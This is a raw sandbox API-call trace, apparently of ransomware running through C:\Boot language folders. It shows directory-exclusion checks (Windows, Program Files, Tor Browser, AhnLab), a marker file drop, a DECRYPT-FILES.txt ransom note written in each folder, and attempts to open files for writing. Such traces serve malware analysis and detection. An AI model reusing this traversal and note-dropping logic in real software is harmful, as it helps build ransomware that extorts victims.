(lpFirst="C:\\Boot\\pl-PL\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.311] lstrlenW (lpString="C:\\Boot\\pl-PL\\") returned 14 [0071.311] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.311] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\pl-PL\\\\jkbimi8.tmp") returned 26 [0071.311] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\\\jkbimi8.tmp" (normalized: "c:\\boot\\pl-pl\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.311] lstrlenW (lpString="C:\\Boot\\pl-PL\\") returned 14 [0071.311] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.311] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\pl-PL\\\\DECRYPT-FILES.txt") returned 32 [0071.311] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\pl-pl\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.311] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.312] CloseHandle (hObject=0x424) returned 1 [0071.313] lstrlenW (lpString="C:\\Boot\\pl-PL\\") returned 14 [0071.313] lstrcatW (in: lpString1="C:\\Boot\\pl-PL\\", lpString2="*" | out: lpString1="C:\\Boot\\pl-PL\\*") returned="C:\\Boot\\pl-PL\\*" [0071.313] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.313] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.313] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.313] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.313] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.313] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.313] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.313] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.313] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.313] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.313] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.313] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.313] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.313] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.313] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.313] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.313] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.313] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.313] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.313] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.313] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.313] lstrlenW (lpString="C:\\Boot\\pl-PL\\") returned 14 [0071.313] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.313] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\pl-PL\\" | out: lpString1="C:\\Boot\\pl-PL\\") returned="C:\\Boot\\pl-PL\\" [0071.313] lstrcatW (in: lpString1="C:\\Boot\\pl-PL\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned="C:\\Boot\\pl-PL\\bootmgr.exe.mui" [0071.313] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.314] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.315] CloseHandle (hObject=0x0) returned 0 [0071.315] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.315] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ba9ba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.315] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.315] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ba9ba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.315] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.315] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.315] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.315] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.315] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.316] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.316] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.316] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.316] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.316] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.316] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.316] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.316] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.316] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.316] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.316] lstrlenW (lpString="C:\\Boot\\pl-PL\\") returned 14 [0071.316] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.316] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\pl-PL\\" | out: lpString1="C:\\Boot\\pl-PL\\") returned="C:\\Boot\\pl-PL\\" [0071.316] lstrcatW (in: lpString1="C:\\Boot\\pl-PL\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\pl-PL\\jkbimi8.tmp") returned="C:\\Boot\\pl-PL\\jkbimi8.tmp" [0071.316] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.316] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\jkbimi8.tmp" (normalized: "c:\\boot\\pl-pl\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.316] CloseHandle (hObject=0x0) returned 0 [0071.316] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.317] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ba9ba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.317] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.317] CloseHandle (hObject=0x420) returned 1 [0071.317] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0071.317] lstrcmpW (lpString1="pt-BR", lpString2=".") returned 1 [0071.317] lstrcmpW (lpString1="pt-BR", lpString2="..") returned 1 [0071.317] lstrcatW (in: lpString1="pt-BR", lpString2="\\" | out: lpString1="pt-BR\\") returned="pt-BR\\" [0071.317] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="pt-BR\\" | out: lpString1="C:\\Boot\\pt-BR\\") returned="C:\\Boot\\pt-BR\\" [0071.317] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\Program Files") returned 0x0 [0071.317] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch=":\\Windows") returned 0x0 [0071.317] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\Games\\") returned 0x0 [0071.317] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.317] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.317] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.317] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.317] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.317] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\All Users") returned 0x0 [0071.317] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.317] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.317] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.317] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="AhnLab") returned 0x0 [0071.317] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.317] lstrlenW (lpString="C:\\Boot\\pt-BR\\") returned 14 [0071.317] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.317] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\pt-BR\\\\jkbimi8.tmp") returned 26 [0071.317] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\\\jkbimi8.tmp" (normalized: "c:\\boot\\pt-br\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.318] lstrlenW (lpString="C:\\Boot\\pt-BR\\") returned 14 [0071.318] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.318] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\pt-BR\\\\DECRYPT-FILES.txt") returned 32 [0071.318] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\pt-br\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.318] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.319] CloseHandle (hObject=0x424) returned 1 [0071.319] lstrlenW (lpString="C:\\Boot\\pt-BR\\") returned 14 [0071.319] lstrcatW (in: lpString1="C:\\Boot\\pt-BR\\", lpString2="*" | out: lpString1="C:\\Boot\\pt-BR\\*") returned="C:\\Boot\\pt-BR\\*" [0071.319] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.320] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.320] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.320] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.320] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.320] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.320] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.320] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.320] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.320] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.320] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.320] lstrlenW (lpString="C:\\Boot\\pt-BR\\") returned 14 [0071.320] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.320] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\pt-BR\\" | out: lpString1="C:\\Boot\\pt-BR\\") returned="C:\\Boot\\pt-BR\\" [0071.320] lstrcatW (in: lpString1="C:\\Boot\\pt-BR\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned="C:\\Boot\\pt-BR\\bootmgr.exe.mui" [0071.320] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.321] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.321] CloseHandle (hObject=0x0) returned 0 [0071.321] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.321] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ba9ba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.321] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.321] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ba9ba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.321] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.321] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.321] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.321] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.321] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.321] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.321] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.321] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.321] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.321] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.321] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.321] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.321] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.321] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.322] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.322] lstrlenW (lpString="C:\\Boot\\pt-BR\\") returned 14 [0071.322] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.322] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\pt-BR\\" | out: lpString1="C:\\Boot\\pt-BR\\") returned="C:\\Boot\\pt-BR\\" [0071.322] lstrcatW (in: lpString1="C:\\Boot\\pt-BR\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\pt-BR\\jkbimi8.tmp") returned="C:\\Boot\\pt-BR\\jkbimi8.tmp" [0071.322] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.322] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\jkbimi8.tmp" (normalized: "c:\\boot\\pt-br\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.322] CloseHandle (hObject=0x0) returned 0 [0071.322] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.322] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ba9ba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.322] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.322] CloseHandle (hObject=0x420) returned 1 [0071.323] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0071.323] lstrcmpW (lpString1="pt-PT", lpString2=".") returned 1 [0071.323] lstrcmpW (lpString1="pt-PT", lpString2="..") returned 1 [0071.323] lstrcatW (in: lpString1="pt-PT", lpString2="\\" | out: lpString1="pt-PT\\") returned="pt-PT\\" [0071.323] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="pt-PT\\" | out: lpString1="C:\\Boot\\pt-PT\\") returned="C:\\Boot\\pt-PT\\" [0071.323] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\Program Files") returned 0x0 [0071.323] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch=":\\Windows") returned 0x0 [0071.323] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\Games\\") returned 0x0 [0071.323] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.323] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.323] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.323] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.323] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.323] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\All Users") returned 0x0 [0071.323] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.323] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.323] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.323] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="AhnLab") returned 0x0 [0071.323] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.323] lstrlenW (lpString="C:\\Boot\\pt-PT\\") returned 14 [0071.323] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.323] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\pt-PT\\\\jkbimi8.tmp") returned 26 [0071.323] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\\\jkbimi8.tmp" (normalized: "c:\\boot\\pt-pt\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.323] lstrlenW (lpString="C:\\Boot\\pt-PT\\") returned 14 [0071.323] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.323] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\pt-PT\\\\DECRYPT-FILES.txt") returned 32 [0071.324] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\pt-pt\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, 